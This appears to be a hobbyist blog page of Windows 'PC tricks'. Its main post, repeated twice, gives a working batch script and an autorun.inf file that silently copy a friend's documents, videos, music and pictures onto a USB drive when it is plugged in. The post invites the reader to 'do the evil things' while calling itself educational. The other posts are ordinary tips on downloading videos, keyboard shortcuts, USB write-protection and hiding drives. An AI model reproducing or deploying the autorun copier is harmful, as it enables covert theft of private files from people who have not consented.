EVERYTHING ABOUT INTERNET
Upadate Everyday .......
How to see friends files using usb drive ??and surprize them
I am going to teach you how you can do this from batch file with the help of autorun.inf file.
Let me tell you the basic things what will happen.
When you plug in in your Pen drive, system will look up for autorun.inf (incase if autorun is not disabled for your drive from the system).
Then we’ll input some command in autorun.inf in such a way that it will load the batch file that does the magic of copying all the files from your PC. In this demonstration I am copying only the files and folders in My Documents.
Here goes the batch code:
@echo off
:CHECK
if not exist "%homedrive%\Copied_files" md "%homedrive%\Copied_files"
if exist "%systemdrive%\Documents and Settings" goto COPIER
goto ERROR
:COPIER
if not exist "%homedrive%\Copied_files\%computername%" md "%homedrive%\Copied_files\%computername%"
if not exist "%homedrive%\Copied_files\%computername%\VIDEOS" md "%homedrive%\Copied_files\%computername%\VIDEOS"
if not exist "%homedrive%\Copied_files\%computername%\PICTURES" md "%homedrive%\Copied_files\%computername%\PICTURES"
if not exist "%homedrive%\Copied_files\%computername%\MUSIC" md "%homedrive%\Copied_files\%computername%\MUSIC"
if not exist "%homedrive%\Copied_files\%computername%\DOWNLOADS" md "%homedrive%\Copied_files\%computername%\DOWNLOADS"
copy /y "%userprofile%\My Documents\*.*" "%homedrive%\Copied_files\%computername%"
copy /y "%userprofile%\My Documents\My Videos" "%homedrive%\Copied_files\%computername%\VIDEOS"
copy /y "%userprofile%\My Documents\My Music" "%homedrive%\Copied_files\%computername%\MUSIC"
copy /y "%userprofile%\My Documents\My Pictures" "%homedrive%\Copied_files\%computername%\PICTURES"
copy /y "%userprofile%\My Documents\Downloads" "%homedrive%\Copied_files\%computername%\DOWNLOADS"
MSG %username% "DONE!"
exit
:ERROR
exit
What it actually does is in first case ,CHECK it checks if your removable storage have Copied_files folder or not. If it doesn’t have then it creates one by using MD (Make Directory) command.
Again it checks if you have documents and settings folder then it will assume that you are using windows XP. Other wise it will return an error and exits.
This happens because; in Windows XP the user’s documents are usually stored in %systemroot%\Documents and Settings folder.
Now I’ve defined another two cases after the first case CHECK, that is COPIER case and ERROR case.
Case COPIER will execute when the program recognizes it is Windows XP, where the real coying work goes o.
Case ERROR will execute when the Documents and Settings doesn’t exists in your system root.
This is just a simple use of Batch programming. Copy the above code and paste it in notepad and save it as Filename.bat.
Now let’s create a file that will load it automatically.
[autorun]
Open=Filename.bat
Action=File Copier
he above code goes in autorun.inf file. Open notepad and copy it and paste it and save as autorun.inf.
Copy the two files, autorun.inf and Filename.bat in your flash drive.
Then plug in your device to your friends PC and do the evil things.
Where is the flaw?
It shows Command prompt window and process of copying (thank god your noob never think that it actually copying).
Another thing is that it determines the windows by searching the file users and Docuemnts and settings, which is not the right way to determine your system operating system.
However this is just an educational tutorial.
Hope this tutorial was helpful.
Let me tell you the basic things what will happen.
When you plug in in your Pen drive, system will look up for autorun.inf (incase if autorun is not disabled for your drive from the system).
Then we’ll input some command in autorun.inf in such a way that it will load the batch file that does the magic of copying all the files from your PC. In this demonstration I am copying only the files and folders in My Documents.
Here goes the batch code:
@echo off
:CHECK
if not exist "%homedrive%\Copied_files" md "%homedrive%\Copied_files"
if exist "%systemdrive%\Documents and Settings" goto COPIER
goto ERROR
:COPIER
if not exist "%homedrive%\Copied_files\%computername%" md "%homedrive%\Copied_files\%computername%"
if not exist "%homedrive%\Copied_files\%computername%\VIDEOS" md "%homedrive%\Copied_files\%computername%\VIDEOS"
if not exist "%homedrive%\Copied_files\%computername%\PICTURES" md "%homedrive%\Copied_files\%computername%\PICTURES"
if not exist "%homedrive%\Copied_files\%computername%\MUSIC" md "%homedrive%\Copied_files\%computername%\MUSIC"
if not exist "%homedrive%\Copied_files\%computername%\DOWNLOADS" md "%homedrive%\Copied_files\%computername%\DOWNLOADS"
copy /y "%userprofile%\My Documents\*.*" "%homedrive%\Copied_files\%computername%"
copy /y "%userprofile%\My Documents\My Videos" "%homedrive%\Copied_files\%computername%\VIDEOS"
copy /y "%userprofile%\My Documents\My Music" "%homedrive%\Copied_files\%computername%\MUSIC"
copy /y "%userprofile%\My Documents\My Pictures" "%homedrive%\Copied_files\%computername%\PICTURES"
copy /y "%userprofile%\My Documents\Downloads" "%homedrive%\Copied_files\%computername%\DOWNLOADS"
MSG %username% "DONE!"
exit
:ERROR
exit
What it actually does is in first case ,CHECK it checks if your removable storage have Copied_files folder or not. If it doesn’t have then it creates one by using MD (Make Directory) command.
Again it checks if you have documents and settings folder then it will assume that you are using windows XP. Other wise it will return an error and exits.
This happens because; in Windows XP the user’s documents are usually stored in %systemroot%\Documents and Settings folder.
Now I’ve defined another two cases after the first case CHECK, that is COPIER case and ERROR case.
Case COPIER will execute when the program recognizes it is Windows XP, where the real coying work goes o.
Case ERROR will execute when the Documents and Settings doesn’t exists in your system root.
This is just a simple use of Batch programming. Copy the above code and paste it in notepad and save it as Filename.bat.
Now let’s create a file that will load it automatically.
[autorun]
Open=Filename.bat
Action=File Copier
he above code goes in autorun.inf file. Open notepad and copy it and paste it and save as autorun.inf.
Copy the two files, autorun.inf and Filename.bat in your flash drive.
Then plug in your device to your friends PC and do the evil things.
Where is the flaw?
It shows Command prompt window and process of copying (thank god your noob never think that it actually copying).
Another thing is that it determines the windows by searching the file users and Docuemnts and settings, which is not the right way to determine your system operating system.
However this is just an educational tutorial.
Hope this tutorial was helpful.
How to download youtube video without java or software?
Well, we saw many tricks and
software to download
youtube videos, but it needs
java, adobe flash player etc.
But now no need to
download any software or
java. Just follow the step
below:
step-1: goto http://
www.youtube.com/
step-2: Now, select your
video and copy the URL.
step-3: Now, goto http://
www.clipconverter.cc/
step-4: paste the URL, select
your formate and size And
click on 'CONTINUE'
step-5: now fill the
information for your video
and click 'START'
and your grabbing/
converting will begin.
step-6: after successfully
grabbing and converting
media, click 'DOWNLOAD'
and your download will start.
NOTE: If you're using Mobile,
use Opera mini 6.1. If you're
using opera mini 4.3 than
After click on 'START'. You'll
need to reload the page for
converting and grabbing
media. UC browser not working.
Window Management Keyboard Tricks
Windows key + up will maximize a window to fill the screen
Windows key + down arrow on a maximized window will restore it to the original size.
Windows key + down will minimize any regular window to the task bar.
Windows key + M will minimize any window to the task bar.
Windows key + right or left arrow will snap a window to half of the screen. This is the same as dragging a window to far left or right side of the screen.
Windows key + home will minimize all open windows in the background except the top most active window. This is the same as shaking the window (Aero Shake).
Windows key + T will iterate through your task bar thumbnails of open applications.
Windows key + D will minimize all windows.
Windows key + Space bar will let you peek at the desktop.
If you have multiple monitors, Windows key + shift + right arrow will move the active window to your next monitor. Windows key + shift + left arrow will revert it back.
Good old Flip 3D is still there. Use Windows key + Tab to bring it up. While holding the Windows key hit tab to iterate through the windows. Hold down Windows key + shift and then hit tab to reverse the direction.
How to Write-Protect Your USB Flash Drive
Many a time, it becomes necessary for us to write protect our USB flash drive so as to protect it from viruses and other malware programs. Because flash drives are so popular and most widely used to move data between computers, they are the prime target for attackers as a means to get infections spread around the computer world. Also, since USB drive is not a Read-Only Memory (ROM), the data inside it can easily be modified or deleted by malware programs.
But unfortunately, most of the new flash drives do not come with a write-protect feature as the manufacturers wish to cut down the cost of production. Hence, the only way to write-protect your USB flash drives is to enable this feature on your own computer.
This can be done by adding a small entry to the Windows registry which acts as a switch that can be enabled to make use of the write protection or disabled to allow write access. Just follow these steps:
1. Open the Registry Editor (Open the “Run” dialog box, type regedit and hit “Enter”).
2. Navigate to the following Registry key:
HKEY_LOCAL_MACHINE\SYSTEM\Curr entControlSet\Control\
3. Create a New Key named as StorageDevicePolicies. To do this right-click on Control, and click on New->Key and name it as StorageDevicePolicies.
4. Now right-click on StorageDevicePolicies and create a New->DWORD (32-bit) Value and name it as WriteProtect.
5. Double-click on WriteProtect and set the Value data to 1.
Now the right-protection for USB drives is enabled on your computer (no restart required) and thus it would not be possible for anyone or any program to add/delete the contents from your USB flash drive. Any attempt to copy or download the files onto the USB drive will result in the following error message being displayed.
To revert and remove the write-protection, all you need to do is just change the Value data for WriteProtect (Step-5) from 1 back to 0. Now write access to all the USB devices is re-enabled.
♥♥Facebook Trick ♥♥
1. Like This Status
2. Press Alt+Space + C To see something amazing !!
██████████████████████████████ ██████████████████████████████ ██████████████████████████████ ██████████████████████████████ ██████████████████████████████ ██████████████████████████████ ██████████████████████████████ ██████████████████████████████
Check whether your computer is male or female !!!
1. Open Notepad
2. Type the following line in notepad:
CreateObject("SAPI.SpVoice").S peak"Good Morning"
3. Save file as- "computer_gender.vbs"
4. Run the file ... If you hear a male voice, you have a boy....If you hear a female voice, you have a female.........
Please do comment and tell whether ur one ws a male or female!!!!!!!!!
PC trics
TRICK - HIDE YOUR DRIVE
AND DATA WITHOUT USING
ANY SOFTWARE.
STEPS:-
1 - GOTO RUN AND TYPE
"DISKPART".(A DOS SCREEN
WILL APPEAR)
2 - TYPE "LIST VOLUME".
(VOLUMES WITH DISK
LETTERS WILL APPEAR IN
FRONT OF
U)
3 - Suppose u want to hide
drive E then type "select
volume 3" .Then a message
will appear in same windows
{ Volume 3 is the selected
volume}
4 - Now type "remove letter
E" .Now a message will come
{ Diskpart Removed the Drive
letter }
Sometime it requires the
reboot the computer or
logoff and login will work.
Nov 24 at 10:40pm · Like
FLUX kILL3R
To access the content of
hidden Drive repeat the
process mentioned above.
But in 4th step replace
“remove" to "assign" i.e.
type "assign letter E" . Note:
THIS WILL NOT WORK FOR
SYSTEM DRIVE WHERE
WINDOWS IS INSTALLED
LIKE C DRIVE.
Subscribe to:
Posts (Atom)